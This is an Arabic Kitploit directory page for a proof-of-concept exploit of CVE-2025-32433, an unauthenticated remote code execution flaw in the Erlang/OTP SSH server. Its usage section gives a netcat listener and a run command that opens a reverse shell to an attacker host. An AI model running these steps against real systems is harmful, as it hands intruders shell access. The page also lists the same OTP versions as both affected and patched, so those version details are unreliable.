Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC يوضح تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة في خادم SSH الخاص بـ Erlang/OTP. من خلال استغلال ثغرة في معالجة رسائل بروتوكول SSH، يمكن للمهاجم تنفيذ أوامر عشوائية على الهدف دون الحاجة إلى بيانات اعتماد صالحة. | Kitploit
أدوات/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC يوضح تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة في خادم SSH الخاص بـ Erlang/OTP. من خلال استغلال ثغرة في معالجة رسائل بروتوكول SSH، يمكن للمهاجم تنفيذ أوامر عشوائية على الهدف دون الحاجة إلى بيانات اعتماد صالحة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 11 أشهرلم تتم المراجعة بعد

CVE-2025-32433 - إثبات المفهوم لاستغلال RCE عبر SSH في Erlang/OTP

CVE-2025-32433

نظرة عامة

إثبات مفهوم يوضح تنفيذ تعليمات برمجية عن بُعد دون مصادقة في خادم SSH الخاص بـ Erlang/OTP.
من خلال استغلال ثغرة في معالجة رسائل بروتوكول SSH، يمكن للمهاجم تنفيذ أوامر عشوائية على الهدف دون الحاجة إلى بيانات اعتماد صالحة.

  • CVE: CVE-2025-32433
  • نقاط CVSS: 10.0 (حرجة)
  • الإصدارات المتأثرة:
    • OTP-27.3.3 والإصدارات الأقدم
    • OTP-26.2.5.11 والإصدارات الأقدم
    • OTP-25.3.2.20 والإصدارات الأقدم

تم تصحيح هذه المشكلة في الإصدارات OTP-27.3.3 وOTP-26.2.5.11 وOTP-25.3.2.20.

المراجع

  • Unit42 Advisory
  • مستودع إثبات المفهوم
  • إدخال NVD

الاستخدام

إعداد المستمع:

root@kitploit:~
nc -lvnp 1234

alt text

تشغيل الاستغلال:

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : عنوان IP الهدف
  • --rport : منفذ SSH الهدف
  • --lhost : عنوان IP الخاص بك للـ reverse shell
  • --lport : منفذ المستمع الخاص بك

alt text

alt text

إخلاء المسؤولية

هذا المستودع مخصص للأغراض التعليمية فقط. لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. قد يكون سوء الاستخدام غير قانوني وممنوع تمامًا.

تنزيل الأداة